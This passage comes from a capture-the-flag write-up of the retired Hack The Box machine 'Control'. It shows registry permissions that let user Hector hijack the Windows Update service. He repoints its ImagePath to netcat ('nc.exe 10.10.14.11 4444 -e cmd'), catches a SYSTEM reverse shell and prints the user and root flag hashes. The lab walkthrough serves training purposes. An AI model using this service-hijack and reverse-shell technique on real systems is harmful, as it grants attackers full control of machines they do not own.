CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearch
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearch
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearchIdxPi
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearchIdxPi
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WudfPf
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WudfPf
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WUDFRd
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WUDFRd
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\xmlprov
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\xmlprov
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{60E8E863–2974–47D1–89E0–E507677AA14F}
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{60E8E863–2974–47D1–89E0–E507677AA14F}
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{6D197A8D–04EB–44C6–B602–FF2798EB7BB3}
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{6D197A8D–04EB–44C6–B602–FF2798EB7BB3}
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{CB20B026–8E3E–4F7D–88FD–E7FB0E93CF39}
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{CB20B026–8E3E–4F7D–88FD–E7FB0E93CF39}
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
|
ABUSING SERVICES
I have a list of services Hector can run with full control. The service “wuauserv” is what I should use as per the hint I received in HTB Forum.
Windows WUAUServ is a system service of the Windows Update feature. It runs only when Windows Update is running. This service runs for a couple of minutes and verifies if there is a Windows Update is going on or no if the service is not running it stops itself.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
*Evil–WinRM* PS C:\Users\Hector\Documents> Get–ItemProperty HKLM:\System\CurrentControlSet\services\wuauserv
Get–ItemProperty HKLM:\System\CurrentControlSet\services\wuauserv
DependOnService : {rpcss}
Description : @%systemroot%\system32\wuaueng.dll,–106
DisplayName : @%systemroot%\system32\wuaueng.dll,–105
ErrorControl : 1
FailureActions : {128, 81, 1, 0…}
ImagePath : C:\Windows\system32\svchost.exe –k netsvcs –p
ObjectName : LocalSystem
RequiredPrivileges : {SeAuditPrivilege, SeCreateGlobalPrivilege, SeCreatePageFilePrivilege, SeTcbPrivilege...}
ServiceSidType : 1
Start : 3
SvcMemHardLimitInMB : 246
SvcMemMidLimitInMB : 167
SvcMemSoftLimitInMB : 88
Type : 32
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : wuauserv
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
|
If you remember the retired machine Helpline, I exploit the windows print spool service to run my nc.exe. I’m going to use the same practice to exploit this machine.
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> copy nc.exe C:\windows\system32\spool\drivers\color\nc.exe
1
2
3
4
5
|
*Evil–WinRM* PS C:\Users\Hector\Documents> reg add “HKLM\System\CurrentControlSet\services\wuauserv” /t REG_EXPAND_SZ /v ImagePath /d “C:\windows\system32\spool\drivers\color\nc.exe 10.10.14.11 4444 -e cmd” /f
reg add “HKLM\System\CurrentControlSet\services\wuauserv” /t REG_EXPAND_SZ /v ImagePath /d “C:\windows\system32\spool\drivers\color\nc.exe 10.10.14.11 4444 -e cmd” /f
The operation completed successfully.
*Evil–WinRM* PS C:\Users\Hector\Documents>
|
START LISTENING:
root@kali:~/htb# rlwrap nc -nlvp 4444 listening on [any] 4444 ...
START SERVICE
1
2
3
|
*Evil–WinRM* PS C:\Users\Hector\Documents>
*Evil–WinRM* PS C:\Users\Hector\Documents> Start–Service wuauserv
Start–Service wuauserv
|
*Evil-WinRM* PS C:\Users\Hector\Documents> get-service wuauserv Status Name DisplayName ------ ---- ----------- Stopped wuauserv Windows Update *Evil-WinRM* PS C:\Users\Hector\Documents> start-service wuauserv
REVERSE SHELL AS ADMINISTRATOR
root@kali:~/htb# rlwrap nc -nlvp 4444 listening on [any] 4444 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.167] 50826 Microsoft Windows [Version 10.0.17763.805] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system C:\Windows\system32>cd / C:\>cd Users/Administrator/Desktop C:\Users/Administrator/Desktop>type root.txt d8782dd01fb15b72c4b5ba77ef2d472b
*Evil-WinRM* PS C:\Users\Hector\Documents> sc.exe query wuauserv SERVICE_NAME: wuauserv TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\Hector\Documents> get-process Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- *Evil-WinRM* PS C:\Users\Hector\Documents> taskkill.exe /f /pid 728 SUCCESS: The process with PID 728 has been terminated.
user=>d8782dd01fb15b72c4b5ba77ef2d472b root=>8f8613f5b4da391f36ef11def4cec1b1
Author : Puckiestyle